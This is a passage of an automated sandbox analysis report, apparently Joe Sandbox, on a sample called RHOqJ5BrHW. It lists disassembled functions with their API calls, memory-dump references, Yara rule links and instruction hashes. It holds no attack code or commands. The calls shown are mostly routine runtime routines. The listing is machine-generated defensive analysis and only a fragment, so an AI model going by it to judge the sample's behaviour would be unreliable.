                                    Function 0099F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009A395C: __FF_MSGBANNER.LIBCMT ref: 009A3973
                                      • Part of subcall function 009A395C: __NMSG_WRITE.LIBCMT ref: 009A397A
                                      • Part of subcall function 009A395C: RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                    • std::exception::exception.LIBCMT ref: 0099F51E
                                    • __CxxThrowException@8.LIBCMT ref: 0099F533
                                      • Part of subcall function 009A6805: RaiseException.KERNEL32(?,?,0000000E,00A36A30,?,?,?,0099F538,0000000E,00A36A30,?,00000001), ref: 009A6856
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 3902256705-0
                                    • Opcode ID: 45ffdcc30213d71c782dda8683dd123f7d8f2b07b34fb1e912b1eb5be93e658e
                                    • Instruction ID: ddc979936068279e354130890936f5e837d11c368109dc43e43a6fa141375ede
                                    • Opcode Fuzzy Hash: 45ffdcc30213d71c782dda8683dd123f7d8f2b07b34fb1e912b1eb5be93e658e
                                    • Instruction Fuzzy Hash: 66F0C23210421EA7DB04BF9CEC11AEEB7ECAF42394F648429F908D6191DBB0D74097E6
                                    Function 009A3839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    • Opcode ID: 9aaafcb1fb8c95edcb1b623c65160de4f1ced4e037de952dae9c5a7bcf33bffd
                                    • Instruction ID: 473b6266d53668a32778ac1d2cde4690780388e5a432e203a0feb1d68ed37dcb
                                    • Opcode Fuzzy Hash: 9aaafcb1fb8c95edcb1b623c65160de4f1ced4e037de952dae9c5a7bcf33bffd
                                    • Instruction Fuzzy Hash: 3D018471800209FBCF22AFA98C0269EBB75BFC2360F15C219F824561A1D7758B61DBD1
                                    Function 009A35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • __lock_file.LIBCMT ref: 009A3629
                                      • Part of subcall function 009A4E1C: __lock.LIBCMT ref: 009A4E3F
                                    • __fclose_nolock.LIBCMT ref: 009A3634
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    • Opcode ID: 067936094661bf7719c87fb06912719c24e66ab1afc2c327e2ae1a98399cc834
                                    • Instruction ID: 1096c25ae8a3a3df5eb9bf6e881b740fdced9eb4f38bc9ddb80cea89b15e2073
                                    • Opcode Fuzzy Hash: 067936094661bf7719c87fb06912719c24e66ab1afc2c327e2ae1a98399cc834
                                    • Instruction Fuzzy Hash: 47F0B431941304BAD711BFA5880776EBAA46F93330F29C508F424AB2C1CB7C8A419FD5
                                    Function 0098C1DE Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,0099E581,00000010,?,00000010,?,00000000), ref: 0098C1F4
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,?,?,0099E581,00000010,?,00000010,?,00000000), ref: 0098C224
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide
                                    • String ID:
                                    • API String ID: 626452242-0
                                    • Opcode ID: 2157afdd84ccaffff2298b8f35b6d58a220c1b89f2e60c985cfbf059d87148c3
                                    • Instruction ID: 50ee12dfa3326ad5ca9bf5148c93167ae005a4bea119401c3268f87ae32c00bc
                                    • Opcode Fuzzy Hash: 2157afdd84ccaffff2298b8f35b6d58a220c1b89f2e60c985cfbf059d87148c3
                                    • Instruction Fuzzy Hash: 9D016272200214BFEB146AA9DC5AF7B7B6CEF95760F108129F905CE2E0DA71E8418770
                                    Function 00CA8E78 Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00CA86E8: GetFileAttributesW.KERNELBASE(?), ref: 00CA86F3
                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00CA8FF8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AttributesCreateDirectoryFile
                                    • String ID:
                                    • API String ID: 3401506121-0
                                    • Opcode ID: 3a05c1840a2a5645db784fc2765bf88cfbabb70aece062a51c4b03a052d7656d
                                    • Instruction ID: 9268056afc831246fec38cf4b9eae319a304598699cbb897e97a29f2b3a7155e
                                    • Opcode Fuzzy Hash: 3a05c1840a2a5645db784fc2765bf88cfbabb70aece062a51c4b03a052d7656d
                                    • Instruction Fuzzy Hash: 2C618331A1020997EF14EFA0D945BEE733AEF58300F005569F60DE7290EB799B49C765
                                    Function 009A2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • __flush.LIBCMT ref: 009A2A0B
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __flush__getptd_noexit
                                    • String ID:
                                    • API String ID: 4101623367-0
                                    • Opcode ID: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                    • Instruction ID: 5b7fcf8c8cdb0e010a63e7952921957f866d808f893e3c67d09d17f0ae0143d5
                                    • Opcode Fuzzy Hash: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
                                    • Instruction Fuzzy Hash: 374171717007069FDF289FADC9815AF7BAAAF86760F24852DE855C7280EB74DD418BC0
                                    Function 009846CE Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00984774
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: cdabce72e9757d78a2807d9f6909d9d094bf6d7f557945b644f548e2166b4f46
                                    • Instruction ID: a8e7fe4a1e5179c286dfee5c98274b586dc9d3049f236d1b8557199c9bbd86b3
                                    • Opcode Fuzzy Hash: cdabce72e9757d78a2807d9f6909d9d094bf6d7f557945b644f548e2166b4f46
                                    • Instruction Fuzzy Hash: CC313C71A0065AAFCB08EF6CD484AADB7B5FF89310F158629E81997700D774BDA0CBD0
                                    Function 0099ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: b36805fd3aee2fe21ff73e94e5f4ce187949a24df468892b163488423e2a52ef
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: 5131C574A00105DBDB18DF5CC480A69FBBAFF49340F648AA5E409CB296DB35EDC1CB90
                                    Function 009F9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 9e4a099c55798e3947ae9374227bc315417f9f40d65566bcf1a8e5cef1d5d406
                                    • Instruction ID: 125c1e65b35f5788d37f7c913a68c089ea16670995a4ea4abd35c0e0b3d3ff30
                                    • Opcode Fuzzy Hash: 9e4a099c55798e3947ae9374227bc315417f9f40d65566bcf1a8e5cef1d5d406
                                    • Instruction Fuzzy Hash: 4A412F745087558FDB24DF18C494B2ABBE0BF85308F19895CE99A4B362C376F885CF52
                                    Function 009AED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit
                                    • String ID:
                                    • API String ID: 3074181302-0
                                    • Opcode ID: 36d0f8e4cc6c09e613e28467db0977a0d6935595ce2207e25b7bcfa6acba4105
                                    • Instruction ID: fba40eb8d209960ab6bdb919b010f81499b9d76945704dd6f307c82d311cb9bd
                                    • Opcode Fuzzy Hash: 36d0f8e4cc6c09e613e28467db0977a0d6935595ce2207e25b7bcfa6acba4105
                                    • Instruction Fuzzy Hash: 672151728456449BD712BFA8DC467597661AFC3735F260A40F4704F1E3DBB48D019BE1
                                    Function 009841A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00984214: FreeLibrary.KERNEL32(00000000,?), ref: 00984247
                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009839FE,?,00000001), ref: 009841DB
                                      • Part of subcall function 00984291: FreeLibrary.KERNEL32(00000000), ref: 009842C4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Library$Free$Load
                                    • String ID:
                                    • API String ID: 2391024519-0
                                    • Opcode ID: bf9551f153ae0633d7ff0110748039e5476401376a59987d882185054429ffb9
                                    • Instruction ID: 3d8a005dfbb1beb56e51d64ca91ec7b9feb78af5a32148126faed5ad0ef974f2
                                    • Opcode Fuzzy Hash: bf9551f153ae0633d7ff0110748039e5476401376a59987d882185054429ffb9
                                    • Instruction Fuzzy Hash: BC11A731604207BBDF10FB74DD06FAE77E99F80700F108829F5A6A62C1DA75DA059B61
                                    Function 009F9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 8fa01a77f1fecd34200dd48398997567fcb28dfeff44639c347b8500e2c3a7fe
                                    • Instruction ID: 449b496c2ce9f221b80d7eb6ef931ec0f521251f6b6c14600cfcaf51a3554813
                                    • Opcode Fuzzy Hash: 8fa01a77f1fecd34200dd48398997567fcb28dfeff44639c347b8500e2c3a7fe
                                    • Instruction Fuzzy Hash: 65210770508705CFDB24DF68C454B2ABBE1BF85304F25496CF6AA47261D732E845DF92
                                    Function 009AAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___lock_fhandle.LIBCMT ref: 009AAFC0
                                      • Part of subcall function 009A7BDA: __getptd_noexit.LIBCMT ref: 009A7BDA
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit$___lock_fhandle
                                    • String ID:
                                    • API String ID: 1144279405-0
                                    • Opcode ID: 138849420ab40c7002096774c1cca8aed8f63b4012055bd65d43d1c721ca0470
                                    • Instruction ID: 1416ba2676e039ddb6d14690d611fb67a72c1769155897d5850a01f1d286e1e6
                                    • Opcode Fuzzy Hash: 138849420ab40c7002096774c1cca8aed8f63b4012055bd65d43d1c721ca0470
                                    • Instruction Fuzzy Hash: D1118F728096609FD712AFE49C4276E7A60AFC3335F2A4640E5741B2E7C7B98D019BE1
                                    Function 0098C2E0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00A1DC00,00000000,?,0098464E,00A1DC00,00010000,00000000,00000000,00000000,00000000), ref: 0098C337
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: f75e2413f2d10c64c2b03c12fa49ddeda12419d2ed6237f3725a3f56d46a8c1c
                                    • Instruction ID: 2a3972a12aff185c02c762ed12561185aedbc572a6d165d5f57ad91235f4c803
                                    • Opcode Fuzzy Hash: f75e2413f2d10c64c2b03c12fa49ddeda12419d2ed6237f3725a3f56d46a8c1c
                                    • Instruction Fuzzy Hash: A5114572200B459FD720DE4AC880F6AB7E9AF44754F14C81EE4AA8AB50C7B1E846CB60
                                    Function 009839DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 650b71de3c9a30fbac77a3276d03968b028a674fcee853f14ed520da4f0fcb35
                                    • Instruction ID: 97bb1f5fa7b8990f1fc47fd4411b2118181c940e9a992ef36d002df3215504d9
                                    • Opcode Fuzzy Hash: 650b71de3c9a30fbac77a3276d03968b028a674fcee853f14ed520da4f0fcb35
                                    • Instruction Fuzzy Hash: 6201813150410EEECF04FFA4C892DFEBF78EF61304F008029B566972A5EA309A49CB60
                                    Function 009A2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                    Download Yara Rule
                                    APIs
                                    • __lock_file.LIBCMT ref: 009A2AED
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit__lock_file
                                    • String ID:
                                    • API String ID: 2597487223-0
                                    • Opcode ID: 5342c579f559c8b902ea2505968c60267e2ba4d91a4ef14a7fa65d228be69eff
                                    • Instruction ID: 683f05cd5c4958b11b1b54a2cfa1cbc40e7c01945942c8822ca17bfd8d4ee26a
                                    • Opcode Fuzzy Hash: 5342c579f559c8b902ea2505968c60267e2ba4d91a4ef14a7fa65d228be69eff
                                    • Instruction Fuzzy Hash: 6DF0F631500215EBDF21AFBC8C023DF36A5BF82324F198415F8149B1D1C7788A52DBD1
                                    Function 00984252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,009839FE,?,00000001), ref: 00984286
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 4e5c692c4b78f89f7215f56fd0e2fe4045c172f3efd88fb7d3ea47ef84254f35
                                    • Instruction ID: c35d5cffda6a7858dbc43c1ce9e36baebbe12557c2ac5fd21ab19a3080725534
                                    • Opcode Fuzzy Hash: 4e5c692c4b78f89f7215f56fd0e2fe4045c172f3efd88fb7d3ea47ef84254f35
                                    • Instruction Fuzzy Hash: 6BF03971509702CFCB34AFA4D890816BBE8BF043293248A3EF1E786610C7329850DF50
                                    Function 009840A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009840C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID:
                                    • API String ID: 82841172-0
                                    • Opcode ID: 237e109acf301925538f4d8c62d9de9f7f92f9d3577182ff8f3144af7b9aca69
                                    • Instruction ID: 064ef3e132ab4451a37510ae78d372431e9ed6fb93722687a8e6742aebdf8ff7
                                    • Opcode Fuzzy Hash: 237e109acf301925538f4d8c62d9de9f7f92f9d3577182ff8f3144af7b9aca69
                                    • Instruction Fuzzy Hash: F0E0C2376002285BC711E698CC46FEA77ADDFC87A0F0A01B5F909E7244DE64E9828690
                                    Function 009CBCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
